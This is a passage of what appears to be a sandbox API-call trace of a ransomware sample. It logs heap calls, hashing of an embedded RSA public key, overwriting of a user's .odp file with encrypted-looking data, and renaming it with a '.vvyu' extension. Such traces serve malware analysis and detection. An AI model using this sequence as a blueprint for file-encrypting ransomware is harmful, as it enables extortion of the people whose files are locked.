(HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0194.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0194.705] SetFilePointer (in: hFile=0x574, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.706] ReadFile (in: hFile=0x574, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x254c, lpOverlapped=0x0) returned 1 [0194.706] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0194.706] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.706] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.706] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea788) returned 1 [0194.708] CryptCreateHash (in: hProv=0x6ea788, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0194.708] CryptHashData (hHash=0x2cbfa90, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.708] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0194.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0194.708] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0194.708] GetLastError () returned 0x0 [0194.708] CryptDestroyHash (hHash=0x2cbfa90) returned 1 [0194.708] CryptReleaseContext (hProv=0x6ea788, dwFlags=0x0) returned 1 [0194.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0194.708] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0194.708] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0194.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0194.709] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0194.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0194.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0194.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2550) returned 0x2d49778 [0194.709] SetFilePointer (in: hFile=0x574, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0194.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0194.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0194.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0194.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0194.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42460 [0194.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a018 [0194.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d424a8 [0194.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a030 [0194.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a060 [0194.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0c0 [0194.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a078 [0194.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0194.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0194.710] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0194.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0194.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a060 | out: hHeap=0x6a0000) returned 1 [0194.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0194.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0c0 | out: hHeap=0x6a0000) returned 1 [0194.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0194.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0c0 [0194.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0194.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a078 [0194.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0194.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a060 [0194.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0194.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0194.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0194.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0194.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0194.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0194.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0194.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0194.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0194.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0194.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0194.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a060 | out: hHeap=0x6a0000) returned 1 [0194.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0194.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0194.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0c0 | out: hHeap=0x6a0000) returned 1 [0194.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0194.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0194.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0194.713] GetCurrentThreadId () returned 0x264 [0194.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0194.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d46510 [0194.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0194.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea788 [0194.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0194.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0194.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0194.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0194.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.714] GetCurrentThreadId () returned 0x264 [0194.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0194.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0194.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0194.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0194.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c827f8 [0194.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0194.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0194.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0194.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0c0 [0194.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0194.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0194.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0194.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0194.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0194.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0194.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0194.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0194.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a060 [0194.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0194.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0194.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0194.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0194.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0194.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0194.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0194.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a078 [0194.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0194.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0194.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0194.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a048 [0194.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0194.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0d8 [0194.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0194.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0194.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0194.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0a8 [0194.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0194.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a090 [0194.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0194.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0f0 [0194.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a090 | out: hHeap=0x6a0000) returned 1 [0194.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a090 [0194.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0a8 | out: hHeap=0x6a0000) returned 1 [0194.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0194.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0194.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0194.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0194.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27748 [0194.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a060 | out: hHeap=0x6a0000) returned 1 [0194.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a060 [0194.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0194.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0194.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0c0 | out: hHeap=0x6a0000) returned 1 [0194.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0194.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0f0 | out: hHeap=0x6a0000) returned 1 [0194.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0194.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0194.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0194.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0194.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0194.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a060 | out: hHeap=0x6a0000) returned 1 [0194.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0194.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0194.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0194.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0194.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea788 | out: hHeap=0x6a0000) returned 1 [0194.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0194.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0194.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0194.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0194.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0194.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0194.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0194.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0194.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a090 | out: hHeap=0x6a0000) returned 1 [0194.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0194.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0d8 | out: hHeap=0x6a0000) returned 1 [0194.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0194.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0194.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a048 | out: hHeap=0x6a0000) returned 1 [0194.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0194.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0194.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0194.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a030 | out: hHeap=0x6a0000) returned 1 [0194.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d424a8 | out: hHeap=0x6a0000) returned 1 [0194.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0194.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0194.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0194.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0194.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0194.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0194.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0194.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0194.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0194.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0194.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0194.726] WriteFile (in: hFile=0x574, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0x2547, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0x2547, lpOverlapped=0x0) returned 1 [0194.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0194.726] SetFilePointerEx (in: hFile=0x574, liDistanceToMove=0x254c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.727] WriteFile (in: hFile=0x574, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0194.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0194.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0194.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0194.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0194.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0194.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0194.728] WriteFile (in: hFile=0x574, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0194.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.728] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.728] WriteFile (in: hFile=0x574, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0194.729] CloseHandle (hObject=0x574) returned 1 [0194.730] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea788 [0194.730] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x890) returned 0x2d2cc80 [0194.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea788 | out: hHeap=0x6a0000) returned 1 [0194.730] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\rU0Q9.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\ivotj\\ru0q9.odp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\rU0Q9.odp.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\ivotj\\ru0q9.odp.vvyu")) returned 1 [0194.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cc80 | out: hHeap=0x6a0000) returned 1 [0194.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 